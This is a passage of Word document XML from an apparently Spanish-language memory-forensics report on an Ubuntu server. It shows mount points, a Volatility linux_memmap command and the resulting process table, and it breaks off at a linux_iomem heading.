    <w:p w14:paraId="4098A898" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B88B186"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cgroup                    /sys/fs/cgroup/devices              cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F4783" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13371A4D"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cgroup                    /sys/fs/cgroup/freezer              cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8A7CE" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354A6DA4"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securityfs                /sys/kernel/security                securityfs   rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D0453" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227B8C2B"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cgroup                    /sys/fs/cgroup/blkio                cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BD00F2" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DA2E04"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cgroup                    /sys/fs/cgroup/cpu,cpuacct          cgroup       ro,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E240AB9" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BC28AE"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cgroup                    /sys/fs/cgroup/systemd              cgroup       ro,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871945F" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7855CF55"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lastRenderedPageBreak/>
        <w:t>cgroup                    /sys/fs/cgroup/perf_event           cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFF362" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C28A1B0"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debugfs                   /sys/kernel/debug                   debugfs      rw,relatime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCFA16D" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717086D2"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configfs                  /sys/kernel/config                  configfs     rw,relatime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F11749" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3016FBB3"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cgroup                    /sys/fs/cgroup/memory               cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC2D3FF" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594BD2E6" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>cgroup                    /sys/fs/cgroup/pids                 cgroup       ro,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE6A5BC" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466787BF" w14:textId="4770F184" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tmpfs                     /var/lib/private                    tmpfs        ro,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF86ED" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E107A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="4A58CBC3" w14:textId="4160970B" w:rsidR="00520AAC" w:rsidRDefault="00520AAC">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F669A" w14:textId="50362B3C" w:rsidR="00520AAC" w:rsidRDefault="00182D42" w:rsidP="00EE7DF8">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:ind w:left="708" w:hanging="708"/>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Ref155654196"/>
      <w:bookmarkStart w:id="183" w:name="_Toc155782534"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="004C5DDC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00520AAC">
        <w:t>Resumen del comando linux_memmap.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="19EE5AAE" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="64DDD025" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_Hlk155650816"/>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8700F9" w14:textId="4F8657C2" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_memmap &gt; /home/jrodg85/informe-memmap.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D08A7" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A81D15A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC"/>
    <w:p w14:paraId="314925A4" w14:textId="6B74F1A5" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:r w:rsidRPr="00520AAC">
        <w:t>Tras una limpieza de datos se obtiene la siguiente información</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35C40A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC"/>
    <w:p w14:paraId="4FAEAE11" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D55B6F"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Task             Pid      Virtual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64216207"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 -------- ------------------</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="184"/>
    <w:p w14:paraId="6FBA82ED"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systemd          1        0x000056198f210000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DBCE0"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kthreadd pid 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883C41B"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kworker/0:0H pid 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1206F469"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mm_percpu_wq pid 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB2741"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ksoftirqd/0 pid 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DAA8E"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rcu_sched pid 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104B711"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rcu_bh pid 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEFEAD4"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migration/0 pid 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B10B72F"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watchdog/0 pid 11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B505CC4"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cpuhp/0 pid 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503AB1D"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kdevtmpfs pid 13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C83E31"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netns pid 14.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506C2A7"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rcu_tasks_kthre pid 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F666D3D"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kauditd pid 16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27799E92"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xenbus pid 17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC4FF9B"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xenwatch pid 18.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438EE2D5"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khungtaskd pid 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0D33A"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oom_reaper pid 21.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D44DB5"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writeback pid 22.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B5F956"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kcompactd0 pid 23.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B3740"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ksmd pid 24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F37861"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khugepaged pid 25.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055DEAD2"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crypto pid 26.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F063BFF"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kintegrityd pid 27.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D38B14E"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kblockd pid 28.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6C6FD"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ata_sff pid 29.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CC6F5"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md pid 30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A95FF9"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edac-poller pid 31.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD3AB6D"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devfreq_wq pid 32.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45643FE7"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watchdogd pid 33.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F44973"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kswapd0 pid 36.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B29407"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ecryptfs-kthrea pid 37.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E57C73"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lastRenderedPageBreak/>
        <w:t>Unable to read pages for kthrotld pid 79.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E4328D"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nvme-wq pid 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27741EEB"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scsi_eh_0 pid 81.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2F317"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scsi_tmf_0 pid 82.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C48B67"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scsi_eh_1 pid 83.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624C44A"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scsi_tmf_1 pid 84.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8B0481"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ipv6_addrconf pid 89.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F38967D"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kstrp pid 99.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F21A24"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kworker/0:1H pid 100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1C405"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raid5wq pid 280.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229F837"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jbd2/xvda1-8 pid 330.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F242E52"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ext4-rsv-conver pid 331.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A11DF8D"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iscsi_eh pid 395.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB9DCF1"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ib-comp-wq pid 408.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DF6A5"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ib_mcast pid 409.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC03C3"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ib_nl_sa_wq pid 410.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9385E"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lvmetad          414      0x000055c919805000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB4309B"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rdma_cm pid 415.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB9AEEE"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systemd-logind   712      0x0000555feb5b1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6478CDC8"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dbus-daemon      720      0x000055e82c96e000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097B4C19"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cron             733      0x000055da6b87f000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2317C6"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accounts-daemon  734      0x00005622d937a000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53E5B8"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lxcfs            737      0x0000559f4b3c0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A06EB4"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atd              749      0x00005617c519f000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3C555"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polkitd          771      0x000055e2bdf70000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027634D6"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agetty           785      0x0000561ce77d2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD598E3"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loop0 pid 951.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C56F737"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loop1 pid 1103.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F56ACAC"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systemd-network  2788     0x000056528aefc000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2B19D0"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systemd-resolve  2804     0x0000556117890000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A221E"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systemd-timesyn  2818     0x000055ec03062000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014BC5C6"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systemd-journal  2825     0x000055788deea000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EEED7B"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uuidd            5077     0x00005626dc1f7000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33197C80"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systemd-udevd    5160     0x000055db9d680000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA0041"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xfsalloc pid 10374.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2778C1F0"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xfs_mru_cache pid 10375.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB4E5A2"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iscsid           10988    0x0000556f3766c000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA62B3"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networkd-dispat  11199    0x000000000040b000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4109479E"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sshd             12159    0x000055ced2c2b000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D4308"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mysqld           5127     0x0000000000758000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D13A16"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apache2          5469     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE2FF7"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loop2 pid 6189.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5172E5A1"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snapd            6219     0x000000c000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE03598"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loop3 pid 6349.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1774D579"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amazon-ssm-agen  6445     0x0000000000401000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E40D8"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lastRenderedPageBreak/>
        <w:t>rsyslogd        26254     0x000055a525c04000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217AA006"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master          26489     0x0000560cfc179000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859BBE6"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qmgr            26500     0x00005561e4c3e000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A6FD3"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kworker/0:0 pid 19056.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0C280"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kworker/u30:2 pid 19454.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116281F8"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apache2         19704     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20B5ED"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apache2         19705     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F00CBC"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apache2         19706     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14252E4A"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apache2         19707     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D83E1"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apache2         19708     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11694085"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kworker/0:1 pid 19709.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDCEE3C"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apache2         19952     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC24F2"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apache2         19953     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A125E1C"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apache2         20230     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB13E4C"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apache2         20231     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AFD98D"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apache2         20232     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39DE73"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apache2         20233     0x0000555836828000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317AEA7"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sh pid 20381.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E942472"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sshd            20483     0x0000556d21d8b000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3446F2D8"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systemd         20485     0x000055cc54c92000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF229C"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(sd-pam)        20486     0x000056198f210000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F81DB"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sshd            20576     0x0000556d21d90000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E657777"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bash            20577     0x000055931a312000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4DFF4"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pickup          20703     0x00005566d1a50000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313077AC"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kworker/u30:1 pid 20781.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6BC7C5"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kworker/u30:0 pid 20886.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB9294"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sudo            20893     0x000055c043a14000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62931294"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insmod          20894     0x00005620e496f000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39904E" w14:textId="3F3C974D" w:rsidR="00E740A3" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E740A3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Unable to read pages for kworker/0:2 pid 20898.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BD3AAF" w14:textId="3CDD6280" w:rsidR="00520AAC" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6F636" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="6CBD1573" w14:textId="12852F28" w:rsidR="00E740A3" w:rsidRDefault="00E740A3">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6EBE44" w14:textId="5E214080" w:rsidR="00520AAC" w:rsidRDefault="00182D42" w:rsidP="00E740A3">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="_Ref155654282"/>
      <w:bookmarkStart w:id="186" w:name="_Toc155782535"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="004C5DDC">
        <w:t xml:space="preserve">I. </w:t>
      </w:r>
      <w:r w:rsidR="00E740A3">
        <w:t>Comando linux_iomem.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w14:paraId="1522E3BA" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="68D6C8BF" w14:textId="77777777" w:rsidR="00E740A3" w:rsidRPr="00C9562B" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
